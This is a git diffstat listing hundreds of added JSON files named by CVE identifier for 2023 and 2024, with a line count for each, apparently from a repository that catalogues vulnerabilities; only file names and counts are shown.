2023/CVE-2023-45280.json | 95 + 2023/CVE-2023-45288.json | 33 + 2023/CVE-2023-4542.json | 33 + 2023/CVE-2023-45471.json | 33 + 2023/CVE-2023-4549.json | 33 + 2023/CVE-2023-45503.json | 33 + 2023/CVE-2023-45540.json | 33 + 2023/CVE-2023-45542.json | 33 + 2023/CVE-2023-45657.json | 33 + 2023/CVE-2023-4568.json | 40 + 2023/CVE-2023-45777.json | 33 + 2023/CVE-2023-45779.json | 33 + 2023/CVE-2023-45819.json | 33 + 2023/CVE-2023-45827.json | 33 + 2023/CVE-2023-45828.json | 33 + 2023/CVE-2023-45857.json | 95 + 2023/CVE-2023-45866.json | 250 + 2023/CVE-2023-4590.json | 33 + 2023/CVE-2023-4596.json | 100 + 2023/CVE-2023-45966.json | 33 + 2023/CVE-2023-45992.json | 33 + 2023/CVE-2023-46003.json | 33 + 2023/CVE-2023-46012.json | 33 + 2023/CVE-2023-46014.json | 33 + 2023/CVE-2023-46015.json | 33 + 2023/CVE-2023-46016.json | 33 + 2023/CVE-2023-46017.json | 33 + 2023/CVE-2023-46018.json | 33 + 2023/CVE-2023-46019.json | 33 + 2023/CVE-2023-46020.json | 33 + 2023/CVE-2023-46021.json | 33 + 2023/CVE-2023-46022.json | 33 + 2023/CVE-2023-46197.json | 33 + 2023/CVE-2023-4622.json | 33 + 2023/CVE-2023-46303.json | 33 + 2023/CVE-2023-46304.json | 33 + 2023/CVE-2023-4631.json | 33 + 2023/CVE-2023-4634.json | 33 + 2023/CVE-2023-46344.json | 33 + 2023/CVE-2023-4636.json | 33 + 2023/CVE-2023-46371.json | 33 + 2023/CVE-2023-46404.json | 33 + 2023/CVE-2023-46442.json | 33 + 2023/CVE-2023-46447.json | 35 + 2023/CVE-2023-46449.json | 33 + 2023/CVE-2023-46450.json | 33 + 2023/CVE-2023-46451.json | 33 + 2023/CVE-2023-46454.json | 33 + 2023/CVE-2023-46474.json | 33 + 2023/CVE-2023-46478.json | 33 + 2023/CVE-2023-46501.json | 33 + 2023/CVE-2023-46604.json | 844 ++ 2023/CVE-2023-46615.json | 33 + 2023/CVE-2023-46694.json | 33 + 2023/CVE-2023-46747.json | 287 + 2023/CVE-2023-46805.json | 259 + 2023/CVE-2023-46813.json | 33 + 2023/CVE-2023-46818.json | 33 + 2023/CVE-2023-4683.json | 33 + 2023/CVE-2023-46865.json | 33 + 2023/CVE-2023-46870.json | 33 + 2023/CVE-2023-46948.json | 33 + 2023/CVE-2023-46954.json | 33 + 2023/CVE-2023-4696.json | 33 + 2023/CVE-2023-46974.json | 33 + 2023/CVE-2023-4698.json | 33 + 2023/CVE-2023-46980.json | 33 + 2023/CVE-2023-4699.json | 33 + 2023/CVE-2023-46998.json | 33 + 2023/CVE-2023-47014.json | 33 + 2023/CVE-2023-47102.json | 33 + 2023/CVE-2023-47108.json | 33 + 2023/CVE-2023-47119.json | 64 + 2023/CVE-2023-47129.json | 33 + 2023/CVE-2023-47179.json | 33 + 2023/CVE-2023-47218.json | 33 + 2023/CVE-2023-47246.json | 136 + 2023/CVE-2023-47253.json | 64 + 2023/CVE-2023-47355.json | 35 + 2023/CVE-2023-47400.json | 37 + 2023/CVE-2023-4741.json | 33 + 2023/CVE-2023-47437.json | 33 + 2023/CVE-2023-47459.json | 33 + 2023/CVE-2023-47460.json | 33 + 2023/CVE-2023-47464.json | 33 + 2023/CVE-2023-47488.json | 33 + 2023/CVE-2023-47489.json | 33 + 2023/CVE-2023-47504.json | 33 + 2023/CVE-2023-47529.json | 33 + 2023/CVE-2023-47564.json | 37 + 2023/CVE-2023-4762.json | 64 + 2023/CVE-2023-47668.json | 64 + 2023/CVE-2023-4771.json | 33 + 2023/CVE-2023-47840.json | 33 + 2023/CVE-2023-47882.json | 36 + 2023/CVE-2023-47883.json | 35 + 2023/CVE-2023-47889.json | 36 + 2023/CVE-2023-4800.json | 33 + 2023/CVE-2023-48022.json | 64 + 2023/CVE-2023-48028.json | 33 + 2023/CVE-2023-48029.json | 33 + 2023/CVE-2023-48031.json | 33 + 2023/CVE-2023-48034.json | 33 + 2023/CVE-2023-48084.json | 64 + 2023/CVE-2023-48104.json | 33 + 2023/CVE-2023-48123.json | 33 + 2023/CVE-2023-4813.json | 33 + 2023/CVE-2023-48194.json | 33 + 2023/CVE-2023-48197.json | 33 + 2023/CVE-2023-48198.json | 33 + 2023/CVE-2023-48199.json | 33 + 2023/CVE-2023-48200.json | 33 + 2023/CVE-2023-4863.json | 343 + 2023/CVE-2023-48777.json | 33 + 2023/CVE-2023-48788.json | 33 + 2023/CVE-2023-48842.json | 33 + 2023/CVE-2023-48849.json | 33 + 2023/CVE-2023-48858.json | 33 + 2023/CVE-2023-48866.json | 33 + 2023/CVE-2023-48974.json | 33 + 2023/CVE-2023-48981.json | 33 + 2023/CVE-2023-48982.json | 33 + 2023/CVE-2023-48983.json | 33 + 2023/CVE-2023-49002.json | 35 + 2023/CVE-2023-49003.json | 35 + 2023/CVE-2023-49038.json | 33 + 2023/CVE-2023-49052.json | 33 + 2023/CVE-2023-49070.json | 199 + 2023/CVE-2023-49103.json | 95 + 2023/CVE-2023-49105.json | 33 + 2023/CVE-2023-4911.json | 502 + 2023/CVE-2023-49313.json | 33 + 2023/CVE-2023-49314.json | 33 + 2023/CVE-2023-49339.json | 33 + 2023/CVE-2023-49438.json | 33 + 2023/CVE-2023-49453.json | 33 + 2023/CVE-2023-49471.json | 33 + 2023/CVE-2023-49496.json | 33 + 2023/CVE-2023-49539.json | 33 + 2023/CVE-2023-49540.json | 33 + 2023/CVE-2023-49543.json | 33 + 2023/CVE-2023-49544.json | 33 + 2023/CVE-2023-49545.json | 33 + 2023/CVE-2023-49546.json | 33 + 2023/CVE-2023-49547.json | 33 + 2023/CVE-2023-49548.json | 33 + 2023/CVE-2023-49606.json | 33 + 2023/CVE-2023-4966.json | 452 + 2023/CVE-2023-49950.json | 33 + 2023/CVE-2023-49954.json | 33 + 2023/CVE-2023-49964.json | 43 + 2023/CVE-2023-49965.json | 33 + 2023/CVE-2023-49968.json | 33 + 2023/CVE-2023-49969.json | 33 + 2023/CVE-2023-49970.json | 33 + 2023/CVE-2023-49971.json | 33 + 2023/CVE-2023-49973.json | 33 + 2023/CVE-2023-49974.json | 33 + 2023/CVE-2023-49976.json | 33 + 2023/CVE-2023-49977.json | 33 + 2023/CVE-2023-49978.json | 33 + 2023/CVE-2023-49979.json | 33 + 2023/CVE-2023-49980.json | 33 + 2023/CVE-2023-49981.json | 33 + 2023/CVE-2023-49982.json | 33 + 2023/CVE-2023-49983.json | 33 + 2023/CVE-2023-49984.json | 33 + 2023/CVE-2023-49985.json | 33 + 2023/CVE-2023-49986.json | 33 + 2023/CVE-2023-49987.json | 33 + 2023/CVE-2023-49988.json | 33 + 2023/CVE-2023-49989.json | 33 + 2023/CVE-2023-50029.json | 33 + 2023/CVE-2023-50070.json | 33 + 2023/CVE-2023-50071.json | 33 + 2023/CVE-2023-50072.json | 33 + 2023/CVE-2023-50094.json | 33 + 2023/CVE-2023-50131.json | 33 + 2023/CVE-2023-50132.json | 33 + 2023/CVE-2023-50164.json | 442 + 2023/CVE-2023-50226.json | 33 + 2023/CVE-2023-5024.json | 33 + 2023/CVE-2023-50245.json | 33 + 2023/CVE-2023-50254.json | 33 + 2023/CVE-2023-50386.json | 33 + 2023/CVE-2023-50387.json | 95 + 2023/CVE-2023-5043.json | 38 + 2023/CVE-2023-5044.json | 99 + 2023/CVE-2023-50465.json | 33 + 2023/CVE-2023-50564.json | 219 + 2023/CVE-2023-50596.json | 33 + 2023/CVE-2023-50643.json | 33 + 2023/CVE-2023-50685.json | 43 + 2023/CVE-2023-5070.json | 33 + 2023/CVE-2023-50780.json | 40 + 2023/CVE-2023-50868.json | 33 + 2023/CVE-2023-5089.json | 40 + 2023/CVE-2023-50917.json | 33 + 2023/CVE-2023-51000.json | 33 + 2023/CVE-2023-51073.json | 33 + 2023/CVE-2023-51119.json | 33 + 2023/CVE-2023-51126.json | 33 + 2023/CVE-2023-51127.json | 33 + 2023/CVE-2023-51214.json | 33 + 2023/CVE-2023-51281.json | 33 + 2023/CVE-2023-51385.json | 684 ++ 2023/CVE-2023-51409.json | 64 + 2023/CVE-2023-5142.json | 33 + 2023/CVE-2023-51448.json | 33 + 2023/CVE-2023-51467.json | 305 + 2023/CVE-2023-51504.json | 33 + 2023/CVE-2023-51518.json | 41 + 2023/CVE-2023-51764.json | 128 + 2023/CVE-2023-5178.json | 33 + 2023/CVE-2023-51800.json | 33 + 2023/CVE-2023-51801.json | 33 + 2023/CVE-2023-51802.json | 33 + 2023/CVE-2023-51810.json | 33 + 2023/CVE-2023-5204.json | 33 + 2023/CVE-2023-52160.json | 33 + 2023/CVE-2023-5217.json | 95 + 2023/CVE-2023-52251.json | 38 + 2023/CVE-2023-52268.json | 33 + 2023/CVE-2023-52654.json | 33 + 2023/CVE-2023-52709.json | 33 + 2023/CVE-2023-5324.json | 33 + 2023/CVE-2023-5360.json | 238 + 2023/CVE-2023-5412.json | 33 + 2023/CVE-2023-5521.json | 33 + 2023/CVE-2023-5538.json | 33 + 2023/CVE-2023-5539.json | 33 + 2023/CVE-2023-5540.json | 33 + 2023/CVE-2023-5546.json | 33 + 2023/CVE-2023-5561.json | 33 + 2023/CVE-2023-5717.json | 33 + 2023/CVE-2023-5720.json | 95 + 2023/CVE-2023-5808.json | 33 + 2023/CVE-2023-5961.json | 33 + 2023/CVE-2023-5965.json | 33 + 2023/CVE-2023-5966.json | 33 + 2023/CVE-2023-6000.json | 33 + 2023/CVE-2023-6019.json | 157 + 2023/CVE-2023-6036.json | 33 + 2023/CVE-2023-6063.json | 95 + 2023/CVE-2023-6241.json | 42 + 2023/CVE-2023-6246.json | 33 + 2023/CVE-2023-6275.json | 33 + 2023/CVE-2023-6289.json | 33 + 2023/CVE-2023-6319.json | 38 + 2023/CVE-2023-6350.json | 33 + 2023/CVE-2023-6421.json | 33 + 2023/CVE-2023-6444.json | 33 + 2023/CVE-2023-6538.json | 33 + 2023/CVE-2023-6553.json | 171 + 2023/CVE-2023-6567.json | 33 + 2023/CVE-2023-6595.json | 33 + 2023/CVE-2023-6634.json | 35 + 2023/CVE-2023-6654.json | 33 + 2023/CVE-2023-6661.json | 33 + 2023/CVE-2023-6663.json | 33 + 2023/CVE-2023-6700.json | 33 + 2023/CVE-2023-6702.json | 33 + 2023/CVE-2023-6710.json | 64 + 2023/CVE-2023-6875.json | 95 + 2023/CVE-2023-6895.json | 64 + 2023/CVE-2023-6931.json | 33 + 2023/CVE-2023-6933.json | 33 + 2023/CVE-2023-6985.json | 37 + 2023/CVE-2023-7016.json | 33 + 2023/CVE-2023-7028.json | 411 + 2023/CVE-2023-7172.json | 33 + 2023/CVE-2023-7173.json | 33 + 2023/CVE-2023-7261.json | 33 + 2024/CVE-2024-0012.json | 286 + 2024/CVE-2024-0015.json | 33 + 2024/CVE-2024-0023.json | 64 + 2024/CVE-2024-0030.json | 33 + 2024/CVE-2024-0039.json | 43 + 2024/CVE-2024-0040.json | 64 + 2024/CVE-2024-0044.json | 347 + 2024/CVE-2024-0049.json | 64 + 2024/CVE-2024-0195.json | 133 + 2024/CVE-2024-0197.json | 33 + 2024/CVE-2024-0204.json | 126 + 2024/CVE-2024-0230.json | 33 + 2024/CVE-2024-0235.json | 45 + 2024/CVE-2024-0305.json | 33 + 2024/CVE-2024-0311.json | 33 + 2024/CVE-2024-0324.json | 33 + 2024/CVE-2024-0352.json | 40 + 2024/CVE-2024-0379.json | 33 + 2024/CVE-2024-0399.json | 33 + 2024/CVE-2024-0507.json | 33 + 2024/CVE-2024-0509.json | 33 + 2024/CVE-2024-0566.json | 33 + 2024/CVE-2024-0582.json | 171 + 2024/CVE-2024-0588.json | 33 + 2024/CVE-2024-0590.json | 33 + 2024/CVE-2024-0623.json | 33 + 2024/CVE-2024-0624.json | 33 + 2024/CVE-2024-0679.json | 37 + 2024/CVE-2024-0683.json | 33 + 2024/CVE-2024-0684.json | 37 + 2024/CVE-2024-0710.json | 33 + 2024/CVE-2024-0713.json | 33 + 2024/CVE-2024-0741.json | 33 + 2024/CVE-2024-0757.json | 40 + 2024/CVE-2024-0762.json | 33 + 2024/CVE-2024-0783.json | 35 + 2024/CVE-2024-0944.json | 33 + 2024/CVE-2024-0986.json | 40 + 2024/CVE-2024-10015.json | 33 + 2024/CVE-2024-10124.json | 64 + 2024/CVE-2024-10140.json | 33 + 2024/CVE-2024-10220.json | 157 + 2024/CVE-2024-10245.json | 33 + 2024/CVE-2024-10354.json | 33 + 2024/CVE-2024-10355.json | 33 + 2024/CVE-2024-10400.json | 36 + 2024/CVE-2024-10410.json | 33 + 2024/CVE-2024-10448.json | 33 + 2024/CVE-2024-10449.json | 33 + 2024/CVE-2024-10470.json | 64 + 2024/CVE-2024-10508.json | 76 + 2024/CVE-2024-10511.json | 33 + 2024/CVE-2024-10516.json | 33 + 2024/CVE-2024-10542.json | 33 + 2024/CVE-2024-10557.json | 33 + 2024/CVE-2024-10586.json | 33 + 2024/CVE-2024-10592.json | 33 + 2024/CVE-2024-10605.json | 33 + 2024/CVE-2024-10629.json | 33 + 2024/CVE-2024-10654.json | 33 + 2024/CVE-2024-1071.json | 219 + 2024/CVE-2024-10728.json | 33 + 2024/CVE-2024-10793.json | 64 + 2024/CVE-2024-1086.json | 225 + 2024/CVE-2024-10914.json | 331 + 2024/CVE-2024-10924.json | 308 + 2024/CVE-2024-10958.json | 33 + 2024/CVE-2024-11003.json | 33 + 2024/CVE-2024-1112.json | 33 + 2024/CVE-2024-11199.json | 33 + 2024/CVE-2024-11201.json | 33 + 2024/CVE-2024-11252.json | 33 + 2024/CVE-2024-11281.json | 33 + 2024/CVE-2024-11318.json | 40 + 2024/CVE-2024-11320.json | 33 + 2024/CVE-2024-11381.json | 33 + 2024/CVE-2024-11387.json | 33 + 2024/CVE-2024-11388.json | 33 + 2024/CVE-2024-11392.json | 33 + 2024/CVE-2024-11393.json | 33 + 2024/CVE-2024-11394.json | 33 + 2024/CVE-2024-11412.json | 33 + 2024/CVE-2024-11428.json | 33 + 2024/CVE-2024-11432.json | 33 + 2024/CVE-2024-11477.json | 33 + 2024/CVE-2024-11616.json | 33 + 2024/CVE-2024-11643.json | 36 + 2024/CVE-2024-11680.json | 33 + 2024/CVE-2024-11728.json | 33 + 2024/CVE-2024-11972.json | 33 + 2024/CVE-2024-12025.json | 33 + 2024/CVE-2024-1207.json | 33 + 2024/CVE-2024-1208.json | 75 + 2024/CVE-2024-1209.json | 33 + 2024/CVE-2024-1212.json | 95 + 2024/CVE-2024-12155.json | 33 + 2024/CVE-2024-12172.json | 36 + 2024/CVE-2024-12209.json | 64 + 2024/CVE-2024-12270.json | 33 + 2024/CVE-2024-12345.json | 33 + 2024/CVE-2024-12356.json | 33 + 2024/CVE-2024-12484.json | 33 + 2024/CVE-2024-1269.json | 33 + 2024/CVE-2024-12849.json | 64 + 2024/CVE-2024-12883.json | 33 + 2024/CVE-2024-12970.json | 33 + 2024/CVE-2024-12986.json | 33 + 2024/CVE-2024-1301.json | 33 + 2024/CVE-2024-1302.json | 33 + 2024/CVE-2024-1303.json | 33 + 2024/CVE-2024-1304.json | 33 + 2024/CVE-2024-1346.json | 33 + 2024/CVE-2024-1380.json | 33 + 2024/CVE-2024-1403.json | 33 + 2024/CVE-2024-1441.json | 33 + 2024/CVE-2024-1512.json | 33 + 2024/CVE-2024-1561.json | 64 + 2024/CVE-2024-1642470.json | 33 + 2024/CVE-2024-1651.json | 99 + 2024/CVE-2024-1655.json | 33 + 2024/CVE-2024-1698.json | 95 + 2024/CVE-2024-1709.json | 197 + 2024/CVE-2024-1781.json | 33 + 2024/CVE-2024-1874.json | 64 + 2024/CVE-2024-1931.json | 33 + 2024/CVE-2024-1939.json | 33 + 2024/CVE-2024-20017.json | 33 + 2024/CVE-2024-20137.json | 33 + 2024/CVE-2024-20291.json | 33 + 2024/CVE-2024-20338.json | 33 + 2024/CVE-2024-20356.json | 68 + 2024/CVE-2024-20404.json | 33 + 2024/CVE-2024-20405.json | 33 + 2024/CVE-2024-20467.json | 33 + 2024/CVE-2024-2054.json | 33 + 2024/CVE-2024-20656.json | 33 + 2024/CVE-2024-20666.json | 70 + 2024/CVE-2024-20696.json | 33 + 2024/CVE-2024-20698.json | 40 + 2024/CVE-2024-2074.json | 33 + 2024/CVE-2024-20746.json | 33 + 2024/CVE-2024-20767.json | 130 + 2024/CVE-2024-20931.json | 126 + 2024/CVE-2024-21006.json | 95 + 2024/CVE-2024-21107.json | 33 + 2024/CVE-2024-21111.json | 95 + 2024/CVE-2024-21182.json | 33 + 2024/CVE-2024-21305.json | 36 + 2024/CVE-2024-21306.json | 95 + 2024/CVE-2024-21320.json | 33 + 2024/CVE-2024-21338.json | 193 + 2024/CVE-2024-21345.json | 64 + 2024/CVE-2024-21378.json | 33 + 2024/CVE-2024-21388.json | 33 + 2024/CVE-2024-21412.json | 38 + 2024/CVE-2024-21413.json | 507 + 2024/CVE-2024-21514.json | 33 + 2024/CVE-2024-21520.json | 33 + 2024/CVE-2024-21534.json | 106 + 2024/CVE-2024-21542.json | 33 + 2024/CVE-2024-21626.json | 436 + 2024/CVE-2024-21633.json | 33 + 2024/CVE-2024-21644.json | 33 + 2024/CVE-2024-21683.json | 192 + 2024/CVE-2024-21689.json | 33 + 2024/CVE-2024-2169.json | 33 + 2024/CVE-2024-21733.json | 33 + 2024/CVE-2024-21754.json | 33 + 2024/CVE-2024-21762.json | 219 + 2024/CVE-2024-21793.json | 33 + 2024/CVE-2024-2188.json | 33 + 2024/CVE-2024-21887.json | 219 + 2024/CVE-2024-21893.json | 64 + 2024/CVE-2024-2193.json | 33 + 2024/CVE-2024-21978.json | 33 + 2024/CVE-2024-21980.json | 33 + 2024/CVE-2024-22002.json | 33 + 2024/CVE-2024-22024.json | 33 + 2024/CVE-2024-22026.json | 33 + 2024/CVE-2024-22120.json | 99 + 2024/CVE-2024-22145.json | 38 + 2024/CVE-2024-22198.json | 36 + 2024/CVE-2024-22243.json | 76 + 2024/CVE-2024-22262.json | 33 + 2024/CVE-2024-22263.json | 33 + 2024/CVE-2024-22274.json | 144 + 2024/CVE-2024-22275.json | 40 + 2024/CVE-2024-22369.json | 33 + 2024/CVE-2024-22393.json | 39 + 2024/CVE-2024-22411.json | 33 + 2024/CVE-2024-22416.json | 33 + 2024/CVE-2024-2242.json | 33 + 2024/CVE-2024-22514.json | 33 + 2024/CVE-2024-22515.json | 64 + 2024/CVE-2024-22526.json | 33 + 2024/CVE-2024-22532.json | 33 + 2024/CVE-2024-22534.json | 33 + 2024/CVE-2024-2257.json | 33 + 2024/CVE-2024-22640.json | 33 + 2024/CVE-2024-22641.json | 33 + 2024/CVE-2024-22734.json | 33 + 2024/CVE-2024-22752.json | 33 + 2024/CVE-2024-22774.json | 33 + 2024/CVE-2024-22853.json | 33 + 2024/CVE-2024-22867.json | 33 + 2024/CVE-2024-22889.json | 33 + 2024/CVE-2024-22890.json | 33 + 2024/CVE-2024-22891.json | 33 + 2024/CVE-2024-22894.json | 33 + 2024/CVE-2024-22899.json | 53 + 2024/CVE-2024-22909.json | 33 + 2024/CVE-2024-22922.json | 33 + 2024/CVE-2024-22939.json | 33 + 2024/CVE-2024-22983.json | 33 + 2024/CVE-2024-23002.json | 33 + 2024/CVE-2024-23108.json | 64 + 2024/CVE-2024-23113.json | 224 + 2024/CVE-2024-23208.json | 33 + 2024/CVE-2024-23298.json | 33 + 2024/CVE-2024-23334.json | 408 + 2024/CVE-2024-23339.json | 33 + 2024/CVE-2024-23346.json | 64 + 2024/CVE-2024-23443.json | 33 + 2024/CVE-2024-23652.json | 33 + 2024/CVE-2024-23653.json | 33 + 2024/CVE-2024-23692.json | 379 + 2024/CVE-2024-23708.json | 33 + 2024/CVE-2024-23709.json | 33 + 2024/CVE-2024-23722.json | 33 + 2024/CVE-2024-23727.json | 36 + 2024/CVE-2024-23738.json | 33 + 2024/CVE-2024-23739.json | 33 + 2024/CVE-2024-23740.json | 33 + 2024/CVE-2024-23741.json | 33 + 2024/CVE-2024-23742.json | 33 + 2024/CVE-2024-23743.json | 33 + 2024/CVE-2024-23745.json | 33 + 2024/CVE-2024-23746.json | 33 + 2024/CVE-2024-23747.json | 33 + 2024/CVE-2024-23772.json | 33 + 2024/CVE-2024-23773.json | 33 + 2024/CVE-2024-23774.json | 33 + 2024/CVE-2024-23780.json | 33 + 2024/CVE-2024-2389.json | 33 + 2024/CVE-2024-23897.json | 1110 ++ 2024/CVE-2024-23995.json | 33 + 2024/CVE-2024-23997.json | 33 + 2024/CVE-2024-23998.json | 33 + 2024/CVE-2024-24034.json | 33 + 2024/CVE-2024-24035.json | 33 + 2024/CVE-2024-24134.json | 33 + 2024/CVE-2024-24135.json | 33 + 2024/CVE-2024-24136.json | 33 + 2024/CVE-2024-24137.json | 33 + 2024/CVE-2024-24138.json | 33 + 2024/CVE-2024-24139.json | 33 + 2024/CVE-2024-24140.json | 33 + 2024/CVE-2024-24141.json | 33 + 2024/CVE-2024-24142.json | 33 + 2024/CVE-2024-2432.json | 33 + 2024/CVE-2024-24336.json | 33 + 2024/CVE-2024-24337.json | 33 + 2024/CVE-2024-24386.json | 33 + 2024/CVE-2024-24396.json | 33 + 2024/CVE-2024-24397.json | 33 + 2024/CVE-2024-24398.json | 33 + 2024/CVE-2024-24401.json | 33 + 2024/CVE-2024-24402.json | 33 + 2024/CVE-2024-24409.json | 33 + 2024/CVE-2024-24488.json | 33 + 2024/CVE-2024-24549.json | 64 + 2024/CVE-2024-24576.json | 286 + 2024/CVE-2024-24590.json | 219 + 2024/CVE-2024-24684.json | 33 + 2024/CVE-2024-24685.json | 33 + 2024/CVE-2024-24686.json | 33 + 2024/CVE-2024-24725.json | 33 + 2024/CVE-2024-24760.json | 33 + 2024/CVE-2024-24787.json | 33 + 2024/CVE-2024-24809.json | 33 + 2024/CVE-2024-24816.json | 33 + 2024/CVE-2024-24919.json | 1769 +++ 2024/CVE-2024-24926.json | 33 + 2024/CVE-2024-25092.json | 33 + 2024/CVE-2024-25153.json | 64 + 2024/CVE-2024-25169.json | 33 + 2024/CVE-2024-25170.json | 33 + 2024/CVE-2024-25175.json | 33 + 2024/CVE-2024-25202.json | 33 + 2024/CVE-2024-25227.json | 64 + 2024/CVE-2024-25277.json | 33 + 2024/CVE-2024-25278.json | 33 + 2024/CVE-2024-25279.json | 33 + 2024/CVE-2024-25280.json | 33 + 2024/CVE-2024-25281.json | 33 + 2024/CVE-2024-25291.json | 33 + 2024/CVE-2024-25292.json | 33 + 2024/CVE-2024-25293.json | 33 + 2024/CVE-2024-25376.json | 33 + 2024/CVE-2024-25381.json | 33 + 2024/CVE-2024-25411.json | 33 + 2024/CVE-2024-25412.json | 33 + 2024/CVE-2024-25423.json | 33 + 2024/CVE-2024-25466.json | 33 + 2024/CVE-2024-25503.json | 33 + 2024/CVE-2024-25600.json | 392 + 2024/CVE-2024-25641.json | 205 + 2024/CVE-2024-25723.json | 33 + 2024/CVE-2024-25731.json | 35 + 2024/CVE-2024-25733.json | 33 + 2024/CVE-2024-25809.json | 33 + 2024/CVE-2024-25832.json | 42 + 2024/CVE-2024-25897.json | 33 + 2024/CVE-2024-26026.json | 64 + 2024/CVE-2024-26144.json | 33 + 2024/CVE-2024-26160.json | 33 + 2024/CVE-2024-26218.json | 33 + 2024/CVE-2024-26229.json | 188 + 2024/CVE-2024-26230.json | 64 + 2024/CVE-2024-26304.json | 33 + 2024/CVE-2024-26308.json | 33 + 2024/CVE-2024-26475.json | 33 + 2024/CVE-2024-26503.json | 38 + 2024/CVE-2024-26521.json | 33 + 2024/CVE-2024-26534.json | 33 + 2024/CVE-2024-26535.json | 33 + 2024/CVE-2024-26560.json | 33 + 2024/CVE-2024-26574.json | 33 + 2024/CVE-2024-26581.json | 73 + 2024/CVE-2024-2667.json | 64 + 2024/CVE-2024-26817.json | 33 + 2024/CVE-2024-27088.json | 33 + 2024/CVE-2024-27130.json | 95 + 2024/CVE-2024-27173.json | 33 + 2024/CVE-2024-27198.json | 442 + 2024/CVE-2024-27292.json | 64 + 2024/CVE-2024-27316.json | 71 + 2024/CVE-2024-27348.json | 123 + 2024/CVE-2024-27460.json | 95 + 2024/CVE-2024-27462.json | 33 + 2024/CVE-2024-27474.json | 33 + 2024/CVE-2024-27518.json | 33 + 2024/CVE-2024-27564.json | 64 + 2024/CVE-2024-27619.json | 33 + 2024/CVE-2024-27630.json | 33 + 2024/CVE-2024-27631.json | 33 + 2024/CVE-2024-27632.json | 33 + 2024/CVE-2024-27665.json | 33 + 2024/CVE-2024-27673.json | 33 + 2024/CVE-2024-27674.json | 33 + 2024/CVE-2024-27697.json | 33 + 2024/CVE-2024-27766.json | 33 + 2024/CVE-2024-27804.json | 33 + 2024/CVE-2024-27815.json | 33 + 2024/CVE-2024-27821.json | 33 + 2024/CVE-2024-27914.json | 33 + 2024/CVE-2024-27954.json | 64 + 2024/CVE-2024-27956.json | 466 + 2024/CVE-2024-27971.json | 33 + 2024/CVE-2024-27972.json | 33 + 2024/CVE-2024-27983.json | 33 + 2024/CVE-2024-28000.json | 166 + 2024/CVE-2024-28085.json | 75 + 2024/CVE-2024-28088.json | 33 + 2024/CVE-2024-28116.json | 105 + 2024/CVE-2024-28247.json | 33 + 2024/CVE-2024-28255.json | 33 + 2024/CVE-2024-28397.json | 64 + 2024/CVE-2024-28515.json | 33 + 2024/CVE-2024-28589.json | 33 + 2024/CVE-2024-28715.json | 33 + 2024/CVE-2024-28741.json | 33 + 2024/CVE-2024-28757.json | 95 + 2024/CVE-2024-2876.json | 157 + 2024/CVE-2024-2879.json | 33 + 2024/CVE-2024-2887.json | 64 + 2024/CVE-2024-28987.json | 126 + 2024/CVE-2024-28995.json | 290 + 2024/CVE-2024-28999.json | 33 + 2024/CVE-2024-29050.json | 33 + 2024/CVE-2024-29059.json | 33 + 2024/CVE-2024-29269.json | 239 + 2024/CVE-2024-29272.json | 33 + 2024/CVE-2024-29275.json | 33 + 2024/CVE-2024-29278.json | 33 + 2024/CVE-2024-2928.json | 33 + 2024/CVE-2024-29296.json | 68 + 2024/CVE-2024-29375.json | 33 + 2024/CVE-2024-29399.json | 33 + 2024/CVE-2024-29404.json | 33 + 2024/CVE-2024-29415.json | 33 + 2024/CVE-2024-29510.json | 33 + 2024/CVE-2024-2961.json | 229 + 2024/CVE-2024-29671.json | 33 + 2024/CVE-2024-29824.json | 64 + 2024/CVE-2024-29847.json | 33 + 2024/CVE-2024-29849.json | 33 + 2024/CVE-2024-29855.json | 33 + 2024/CVE-2024-29863.json | 33 + 2024/CVE-2024-29868.json | 33 + 2024/CVE-2024-29895.json | 135 + 2024/CVE-2024-29943.json | 33 + 2024/CVE-2024-2997.json | 33 + 2024/CVE-2024-29972.json | 64 + 2024/CVE-2024-29973.json | 188 + 2024/CVE-2024-29988.json | 33 + 2024/CVE-2024-30043.json | 33 + 2024/CVE-2024-30051.json | 33 + 2024/CVE-2024-30052.json | 33 + 2024/CVE-2024-30056.json | 33 + 2024/CVE-2024-30085.json | 64 + 2024/CVE-2024-30088.json | 188 + 2024/CVE-2024-30090.json | 33 + 2024/CVE-2024-30212.json | 33 + 2024/CVE-2024-30255.json | 33 + 2024/CVE-2024-30270.json | 33 + 2024/CVE-2024-30491.json | 33 + 2024/CVE-2024-30614.json | 33 + 2024/CVE-2024-30656.json | 42 + 2024/CVE-2024-30850.json | 33 + 2024/CVE-2024-30851.json | 33 + 2024/CVE-2024-30875.json | 33 + 2024/CVE-2024-30896.json | 33 + 2024/CVE-2024-3094.json | 1875 +++ 2024/CVE-2024-30956.json | 33 + 2024/CVE-2024-30973.json | 33 + 2024/CVE-2024-30998.json | 33 + 2024/CVE-2024-3105.json | 41 + 2024/CVE-2024-3116.json | 33 + 2024/CVE-2024-31211.json | 33 + 2024/CVE-2024-31317.json | 33 + 2024/CVE-2024-31319.json | 33 + 2024/CVE-2024-31351.json | 33 + 2024/CVE-2024-31497.json | 103 + 2024/CVE-2024-31666.json | 33 + 2024/CVE-2024-31719.json | 33 + 2024/CVE-2024-3177.json | 33 + 2024/CVE-2024-31771.json | 33 + 2024/CVE-2024-31777.json | 33 + 2024/CVE-2024-31819.json | 64 + 2024/CVE-2024-3183.json | 33 + 2024/CVE-2024-31835.json | 33 + 2024/CVE-2024-31848.json | 43 + 2024/CVE-2024-31974.json | 33 + 2024/CVE-2024-31982.json | 95 + 2024/CVE-2024-31989.json | 33 + 2024/CVE-2024-32002.json | 2019 ++++ 2024/CVE-2024-32004.json | 64 + 2024/CVE-2024-32030.json | 33 + 2024/CVE-2024-32104.json | 33 + 2024/CVE-2024-32113.json | 136 + 2024/CVE-2024-32136.json | 33 + 2024/CVE-2024-3217.json | 33 + 2024/CVE-2024-32205.json | 33 + 2024/CVE-2024-32238.json | 64 + 2024/CVE-2024-32258.json | 33 + 2024/CVE-2024-32369.json | 33 + 2024/CVE-2024-32370.json | 33 + 2024/CVE-2024-32371.json | 33 + 2024/CVE-2024-32399.json | 33 + 2024/CVE-2024-32459.json | 33 + 2024/CVE-2024-32523.json | 33 + 2024/CVE-2024-32640.json | 138 + 2024/CVE-2024-32651.json | 64 + 2024/CVE-2024-32700.json | 33 + 2024/CVE-2024-32709.json | 33 + 2024/CVE-2024-3272.json | 64 + 2024/CVE-2024-3273.json | 297 + 2024/CVE-2024-3293.json | 33 + 2024/CVE-2024-33111.json | 33 + 2024/CVE-2024-33113.json | 64 + 2024/CVE-2024-33209.json | 33 + 2024/CVE-2024-33210.json | 33 + 2024/CVE-2024-33231.json | 37 + 2024/CVE-2024-33352.json | 41 + 2024/CVE-2024-33453.json | 33 + 